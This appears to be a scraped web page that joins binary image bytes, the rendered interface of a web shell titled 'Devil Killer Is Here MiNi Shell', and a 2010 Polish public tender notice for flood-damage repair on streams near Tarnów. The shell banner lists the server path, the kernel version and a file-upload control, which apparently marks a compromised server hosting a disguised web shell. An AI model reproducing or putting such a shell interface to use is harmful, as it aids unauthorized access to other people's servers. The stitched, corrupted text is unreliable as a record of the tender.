JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100824/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100824/228899-N-2010.html

<p class="kh_header"><b>Tarnów: Wykonanie robót budowlanych dla zadań pn.:

Część 1 Zamówienia
Usuwanie szkód powodziowych na pot. Wątok w km 4+150 - 4+300 w m. Tarnów

Część 2 Zamówienia
Usuwanie szkód powodziowych na pot. Olszynka w km 15+180 - 15+280 w m. Szerzyny

Część 3 Zamówienia
Usuwanie szkód powodziowych na pot. Szczepanowski w km 1+280 - 2+680 w m. Szczepanowice</b><br>
<b>Numer ogłoszenia: 228899 - 2010; data zamieszczenia: 24.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Małopolski Zarząd Melioracji i Urządzeń Wodnych w Krakowie Inspektorat Rejonowy w Tarnowie , ul. Ostrogskich 5, 33-100 Tarnów, woj. małopolskie, tel. 014 6376922, faks 014 6376913.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.mzmiuw.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych dla zadań pn.:

Część 1 Zamówienia
Usuwanie szkód powodziowych na pot. Wątok w km 4+150 - 4+300 w m. Tarnów

Część 2 Zamówienia
Usuwanie szkód powodziowych na pot. Olszynka w km 15+180 - 15+280 w m. Szerzyny

Część 3 Zamówienia
Usuwanie szkód powodziowych na pot. Szczepanowski w km 1+280 - 2+680 w m. Szczepanowice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CZĘŚĆ 1 ZAMÓWIENIA
Przedmiotem zamówienia jest wykonanie robót budowlanych dla zadania pn: Usuwanie szkód powodziowych na pot. Wątok w km 4+150 - 4+300 w m. Tarnów.
Zadanie obejmuje odcinkową zabudowę wyrwy opaską brzegową na prawej skarpie potoku w sąsiedztwie Zespołu Przychodni Specjalistycznych Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Tarnowie, na łącznej długości ok. 150 mb.

Zakres planowanych robót winien uwzględniać:
km. 4+150-4+300 potoku Wątok
1/  roboty przygotowawcze
- pomiary geodezyjne
- przygotowanie dróg technologicznych ( z rozbiórką)
2/ roboty zabezpieczeniowe
- roboty ziemne pod planowane budowle
- wykonanie opaski do wys. Min. 2,0 m z gabionów zalanych betonem, posadowionych na ławie betonowej poniżej dna min 0,7 m,
- wykonanie gurtów z koszy siatkowo-kamiennych z palisadą lub gabionów min. 2 szt.
- wykonanie narzutów kamiennych podwodnych w dnie i za gurtami 
3/ roboty wykończeniowe
- plantowanie skarp i terenu przyległego 
- obsiew mieszanką traw

Wykonawca podejmujący się realizacji przedmiotu zamówienia zobowiązany będzie do:
a)	opracowania dokumentacji projektowej służącej do realizacji przedmiotu zamówienia na wykonanie robót budowlanych, dla których nie jest wymagane uzyskanie pozwolenia na budowę
b)	uzyskania niezbędnych uzgodnień, wymaganych odrębnymi przepisami niezbędnych do zrealizowania zadania 
c)	opracowania, w uzgodnieniu z inwestorem, specyfikacji technicznych wykonania i odbioru robót budowlanych,
d)	sporządzenia informacji dotyczącej bezpieczeństwa i ochrony zdrowia, w przypadku gdy jej opracowanie jest wymagane na podstawie odrębnych przepisów,
e)	ustalenia geotechnicznych warunków posadowienia projektowanych obiektów budowlanych,
f)	sporządzenia inwentaryzacji fotograficznej stanu istniejącego potoku,
g)	przekazania kopii dokumentacji w formie elektronicznej,
h)	realizacja robót w oparciu o uzgodnioną i przyjętą przez Zamawiającego dokumentację projektową,
i)	prowadzenia dziennika budowy i księgi obmiarów,
j)	przygotowania rozliczenia końcowego robót i sporządzenia przy współpracy z inspektorem nadzoru operatu powykonawczego,
k)	sprawowania nadzoru autorskiego nad realizowanymi robotami,
l)	przekazania zrealizowanego obiektu administratorowi potoku,
m)	sporządzenia inwentaryzacji geodezyjnej powykonawczej oraz inwentaryzacji fotograficznej.

Zakres zabezpieczeń stopy skarpy opaską brzegową powinien uwzględniać jednostronne (prawostronne) zabezpieczenie całego wskazanego odcinka potoku.

Szczegółowy zakres wyszczególnionych robót na w/w odcinku potoku winien wynikać z inwentaryzacji terenowej, wywiadów środowiskowych, pomiarów geodezyjnych a w szczególności z obliczeń hydrologiczno-hydraulicznych przekroju poprzecznego i podłużnego cieku.

Zakres powyższych robót winien uwzględniać wszystkie roboty towarzyszące (np. transport zewnętrzny i wewnętrzny materiałów itp.) niezbędne do prawidłowego wykonania wymienionych elementów robót podstawowych.

Szczegółowy opis przedmiotu zamówienia zawiera Program Funkcjonalno-Użytkowy stanowiący załącznik nr 8 do SIWZ.
Program funkcjonalno-użytkowy określa wymagania dotyczące zaprojektowania, realizacji ,odbioru i przekazania do użytkowania remontowanego odcinka potoku.

CZĘŚĆ 2 ZAMÓWIENIA
Przedmiotem zamówienia jest wykonanie robót budowlanych dla zadania pn: Usuwanie szkód powodziowych na pot. Olszynka w km 15+180 - 15+280 w m. Szerzyny.
Zadanie obejmuje udrożnienie koryta potoku wraz z odcinkową zabudową wyrw opaskami brzegowymi na łącznej długości ok. 100 mb. 

Zakres planowanych robót winien uwzględniać:
km. 15+180 - 15+280 Olszynka
1/  roboty przygotowawcze
- pomiary geodezyjne
- przygotowanie dróg technologicznych ( z rozbiórką)
2/ roboty zabezpieczeniowe
- roboty ziemne pod planowane budowle
- wykonanie opasek z koszy siatkowo-kamiennych, gabionów lub materacy maccaferri do wys. min. 1,5 m
- wykonanie gurtów z koszy siatkowo-kamiennych z palisadą min. 4 szt.
- wykonanie wyściółek faszynowych w dnie
- wykonanie narzutów kamiennych nadwodnych, podwodnych w dnie i za gurtami 
3/ roboty wykończeniowe
- plantowanie skarp i terenu przyległego 
- obsiew mieszanką traw

Wykonawca podejmujący się realizacji przedmiotu zamówienia zobowiązany będzie do:
a)	opracowania dokumentacji projektowej służącej do realizacji przedmiotu zamówienia na wykonanie robót budowlanych, dla których nie jest wymagane uzyskanie pozwolenia na budowę
b)	uzyskania niezbędnych uzgodnień, wymaganych odrębnymi przepisami oraz niezbędnych zgód właścicieli gruntów niezbędnych do realizacji zadania 
c)	opracowania, w uzgodnieniu z inwestorem, specyfikacji technicznych wykonania i odbioru robót budowlanych,
d)	sporządzenia informacji dotyczącej bezpieczeństwa i ochrony zdrowia, w przypadku gdy jej opracowanie jest wymagane na podstawie odrębnych przepisów,
e)	ustalenia geotechnicznych warunków posadowienia projektowanych obiektów budowlanych,
f)	sporządzenia inwentaryzacji fotograficznej stanu istniejącego potoku,
g)	przekazania kopii dokumentacji w formie elektronicznej,
h)	realizacja robót w oparciu o uzgodnioną i przyjętą przez Zamawiającego dokumentację projektową,
i)	prowadzenia dziennika budowy i księgi obmiarów,
j)	przygotowania rozliczenia końcowego robót i sporządzenia przy współpracy z inspektorem nadzoru operatu powykonawczego,
k)	sprawowania nadzoru autorskiego nad realizowanymi robotami,
l)	przekazania zrealizowanego obiektu administratorowi potoku,
m)	sporządzenia inwentaryzacji geodezyjnej powykonawczej oraz inwentaryzacji fotograficznej.

Zakres zabezpieczeń stopy skarpy opaskami brzegowymi powinien uwzględniać obustronne zabezpieczenie całego wskazanego odcinka potoku.

Szczegółowy zakres wyszczególnionych robót na w/w odcinku potoku winien wynikać z inwentaryzacji terenowej, wywiadów środowiskowych, pomiarów geodezyjnych a w szczególności z obliczeń hydrologiczno-hydraulicznych przekroju poprzecznego i podłużnego cieku.

Zakres powyższych robót winien uwzględniać wszystkie roboty towarzyszące (np. transport zewnętrzny i wewnętrzny materiałów itp.) niezbędne do prawidłowego wykonania wymienionych elementów robót podstawowych.

Szczegółowy opis przedmiotu zamówienia zawiera Program Funkcjonalno-Użytkowy stanowiący załącznik nr 8 do SIWZ.
Program funkcjonalno-użytkowy określa wymagania dotyczące zaprojektowania, realizacji ,odbioru i przekazania do użytkowania remontowanego odcinka potoku.

CZĘŚĆ 3 ZAMÓWIENIA
Przedmiotem zamówienia jest wykonanie robót budowlanych dla zadania pn: Usuwanie szkód powodziowych na pot. Szczepanowski w km 1+280 - 2+680 w m. Szczepanowice.
Zadanie obejmuje usuwanie zatorów w korycie potoku w km 1+280 - 2+680 wraz z odcinkowym zabezpieczeniem prawej skarpy opaskami brzegowymi w km 2+570 - 2+670 na długości ok. 100 mb. 

Zakres planowanych robót winien uwzględniać:
1/  Rozbiórka zatorów z koryta potoku w km 1+280 - 2+680
2/ Roboty przygotowawcze na odcinku w km 2+570 -2+670
- pomiary geodezyjne
- wycinka drze
- wycinka zakrzaczeń (z karczowaniem)
- usuwanie zatorów w korycie potoku
- przygotowanie dróg technologicznych ( z rozbiórką)
2/ Roboty zabezpieczeniowe prawej skarpy potoku na odcinku w km 2+570 - 2+670
- roboty ziemne pod planowane budowle
- wykonanie opaski z koszy siatkowo-kamiennych z obetonowaniem do wys. min. 2,0 m
- wykonanie gurtów z koszy siatkowo-kamiennych z palisadą min. 4 szt.
- wykonanie wyściółek faszynowych w dnie
- wykonanie narzutów kamiennych nadwodnych, podwodnych w dnie i za gurtami 
3/ Roboty wykończeniowe
- plantowanie skarp i terenu przyległego 
- obsiew mieszanką traw

Wykonawca podejmujący się realizacji przedmiotu zamówienia zobowiązany będzie do:
a)	opracowania dokumentacji projektowej służącej do realizacji przedmiotu zamówienia na wykonanie robót budowlanych, dla których nie jest wymagane uzyskanie pozwolenia na budowę
b)	uzyskania niezbędnych uzgodnień, wymaganych odrębnymi przepisami oraz niezbędnych zgód właścicieli gruntów niezbędnych do realizacji zadania 
c)	opracowania, w uzgodnieniu z inwestorem, specyfikacji technicznych wykonania i odbioru robót budowlanych,
d)	sporządzenia informacji dotyczącej bezpieczeństwa i ochrony zdrowia, w przypadku gdy jej opracowanie jest wymagane na podstawie odrębnych przepisów,
e)	ustalenia geotechnicznych warunków posadowienia projektowanych obiektów budowlanych,
f)	sporządzenia inwentaryzacji fotograficznej stanu istniejącego potoku,
g)	przekazania kopii dokumentacji w formie elektronicznej,
h)	realizacja robót w oparciu o uzgodnioną i przyjętą przez Zamawiającego dokumentację projektową,
i)	prowadzenia dziennika budowy i księgi obmiarów,
j)	przygotowania rozliczenia końcowego robót i sporządzenia przy współpracy z inspektorem nadzoru operatu powykonawczego,
k)	sprawowania nadzoru autorskiego nad realizowanymi robotami,
l)	przekazania zrealizowanego obiektu administratorowi potoku,
m)	sporządzenia inwentaryzacji geodezyjnej powykonawczej oraz inwentaryzacji fotograficznej.
 
Zakres zabezpieczeń stopy skarpy opaskami brzegowymi powinien uwzględniać jednostronne zabezpieczenie stopy skarpy (skarpa prawa) wskazanego odcinka potoku.

Szczegółowy zakres wyszczególnionych robót na w/w odcinku potoku winien wynikać z inwentaryzacji terenowej, wywiadów środowiskowych, pomiarów geodezyjnych a w szczególności z obliczeń hydrologiczno-hydraulicznych przekroju poprzecznego i podłużnego cieku.

Zakres powyższych robót winien uwzględniać wszystkie roboty towarzyszące (np. transport zewnętrzny i wewnętrzny materiałów itp.) niezbędne do prawidłowego wykonania wymienionych elementów robót podstawowych.

Zakres powyższych robót powinien uwzględniać ewentualne odszkodowania za szkody wynikłe w trakcie prowadzenia robót.

Szczegółowy opis przedmiotu zamówienia zawiera Program Funkcjonalno-Użytkowy stanowiący załącznik nr 8 do SIWZ.
Program funkcjonalno-użytkowy określa wymagania dotyczące zaprojektowania, realizacji ,odbioru i przekazania do użytkowania remontowanego odcinka potoku.

Wykonawca będzie zobowiązany do ubezpieczenia budowy i robót budowlanych w szczególności od zdarzeń losowych (z klauzulą ubezpieczenia wartości kontraktu od następstw deszczów nawalnych, zalania, powodzi i obsunięć ). Wykonawca będzie zobowiązany do dostarczenia dokumentu ubezpieczenia w terminie 7 dni od daty podpisania umowy.   

Zamawiający wymaga, aby Wykonawca udzielił rękojmi na roboty budowlane i materiały przez okres 36 miesięcy od daty odbioru końcowego zadania.
Zamawiający dopuszcza możliwość powierzenia zamówienia podwykonawcom. Działając zgodnie z treścią art. 36 ust.4 Ustawy, Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzyć Wykonawcom.
Prace geodezyjne należy wykonać zgodnie z Rozporządzeniem Ministra Gospodarki Przestrzennej i Budownictwa z dnia 21 lutego 1995 roku w sprawie rodzaju i zakresu opracowań  geodezyjno - kartograficznych oraz czynności geodezyjnych obowiązujących w budownictwie (Dz. U. Nr 25 z 13.03. 1995 roku poz. 133)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.24.60.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> DLA CZĘŚCI 1 ZAMÓWIENIA:
Wadium w wysokości 6 000  zł należy wnieść w terminie do dnia 08.09.2010 do godz. 9:30. 
DLA CZĘŚCI 2 ZAMÓWIENIA:
Wadium w wysokości 3 000  zł należy wnieść w terminie do dnia 08.09.2010 do godz. 9:30. 
DLA CZĘŚCI 3 ZAMÓWIENIA:
Wadium w wysokości 1 500  zł należy wnieść w terminie do dnia 08.09.2010 do godz. 9:30. 

Wadium winno być wniesione w:
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z   tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj. Dz. U. Nr 42, poz. 275 z 2007 r.)
Wadium wnoszone w pieniądzu należy przelać na rachunek KREDYT BANK PBI S.A. II O /  KRAKÓW nr konta 70 1500 1487 1214 8003 1851 0000 w terminie do dnia 07.09.2010 r.
Wadium w innej formie niż pieniądz należy złożyć w formie oryginału w siedzibie Zamawiającego w Tarnowie ul. Ostrogskich 5 sekretariat ( I piętro ).
Dowód wpłaty wadium należy dołączyć do oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.
DLA CZĘŚCI 1 ZAMÓWIENIA:
Wykonawcy muszą wykazać, że wykonali 1 zamówienie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem i wartością (wartość nie mniejsza niż 300 000 zł) robotom budowlanym stanowiącym przedmiot zamówienia. Za zamówienia odpowiadające swoim rodzajem Zamawiający uznaje roboty budowlane w zakresie regulacji lub zabezpieczenia rzek lub potoków.
DLA CZĘŚCI 2 ZAMÓWIENIA:
Wykonawcy muszą wykazać, że wykonali 1 zamówienie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem i wartością (wartość nie mniejsza niż 100 000 zł) robotom budowlanym stanowiącym przedmiot zamówienia. Za zamówienia odpowiadające swoim rodzajem Zamawiający uznaje roboty budowlane w zakresie regulacji lub zabezpieczenia rzek lub potoków.
DLA CZĘŚCI 3 ZAMÓWIENIA:
Wykonawcy muszą wykazać, że wykonali 1 zamówienie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem i wartością (wartość nie mniejsza niż 100 000 zł) robotom budowlanym stanowiącym przedmiot zamówienia. Za zamówienia odpowiadające swoim rodzajem Zamawiający uznaje roboty budowlane w zakresie regulacji lub zabezpieczenia rzek lub potoków.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.
DLA CZĘŚCI 1 ZAMÓWIENIA:
Wykonawcy muszą wykazać, że dysponują w szczególności: koparką 1 szt.
DLA CZĘŚCI 2 ZAMÓWIENIA:
Wykonawcy muszą wykazać, że dysponują w szczególności: koparką 1 szt.
DLA CZĘŚCI 3 ZAMÓWIENIA:
Wykonawcy muszą wykazać, że dysponują w szczególności: koparką 1 szt.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.
DLA CZĘŚCI 1 ZAMÓWIENIA:
Wykonawcy muszą wykazać, że dysponują osobami posiadającymi kwalifikacje konieczne do realizacji zamówienia w rozumieniu ustawy Prawo budowlane z dnia 7 lipca 1994( tj. Dz. U. z 2006 r., Nr 156, poz. 1118 z późn. zm.), to jest kierownik budowy posiada uprawnienia odpowiednie do wykonywania robót wodno-melioracyjnych  oraz jest członkiem  Okręgowej Izby Inżynierów Budownictwa   
DLA CZĘŚCI 2 ZAMÓWIENIA:
Wykonawcy muszą wykazać, że dysponują osobami posiadającymi kwalifikacje konieczne do realizacji zamówienia w rozumieniu ustawy Prawo budowlane z dnia 7 lipca 1994( tj. Dz. U. z 2006 r., Nr 156, poz. 1118 z późn. zm.), to jest kierownik budowy posiada uprawnienia odpowiednie do wykonywania robót wodno-melioracyjnych  oraz jest członkiem  Okręgowej Izby Inżynierów Budownictwa
DLA CZĘŚCI 3 ZAMÓWIENIA:
Wykonawcy muszą wykazać, że dysponują osobami posiadającymi kwalifikacje konieczne do realizacji zamówienia w rozumieniu ustawy Prawo budowlane z dnia 7 lipca 1994( tj. Dz. U. z 2006 r., Nr 156, poz. 1118 z późn. zm.), to jest kierownik budowy posiada uprawnienia odpowiednie do wykonywania robót wodno-melioracyjnych  oraz jest członkiem  Okręgowej Izby Inżynierów Budownictwa</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.
DLA CZĘŚCI 1 ZAMÓWIENIA:
Wykonawcy muszą wykazać, że:
a) ich obroty za ostatni rok obrotowy, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres (na podstawie rachunku zysków i strat) w wysokości nie mniejszej niż 600 000 zł.
b) dysponują własnymi środkami finansowymi (dopuszczalne jest tu wykazanie środków z kredytu obrotowego lub z innego kredytu o ile te środki finansowe nie są przeznaczone na zrealizowanie konkretnego celu lub promesą kredytową lub zdolnością kredytową ) w wysokości nie mniejszej niż 300 000 zł (słownie: trzysta tysięcy złotych).
c) są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę minimum stanowiącą wartość złożonej oferty.
DLA CZĘŚCI 2 ZAMÓWIENIA:
Wykonawcy muszą wykazać, że:
a) ich obroty za ostatni rok obrotowy, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres (na podstawie rachunku zysków i strat) w wysokości nie mniejszej niż 250 000 zł.
b) dysponują własnymi środkami finansowymi (dopuszczalne jest tu wykazanie środków z kredytu obrotowego lub z innego kredytu o ile te środki finansowe nie są przeznaczone na zrealizowanie konkretnego celu lub promesą kredytową lub zdolnością kredytową ) w wysokości nie mniejszej niż 100 000 zł (słownie: sto tysięcy złotych).
c) są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę minimum stanowiącą wartość złożonej oferty.
DLA CZĘŚCI 3 ZAMÓWIENIA:
Wykonawcy muszą wykazać:
a) ich obroty za ostatni rok obrotowy, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres (na podstawie rachunku zysków i strat) w wysokości nie mniejszej niż 200 000 zł.
b) dysponują własnymi środkami finansowymi (dopuszczalne jest tu wykazanie środków z kredytu obrotowego lub z innego kredytu o ile te środki finansowe nie są przeznaczone na zrealizowanie konkretnego celu lub promesą kredytową lub zdolnością kredytową ) w wysokości nie mniejszej niż 100 000 zł (słownie: sto tysięcy złotych).
c) są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę minimum stanowiącą wartość złożonej oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

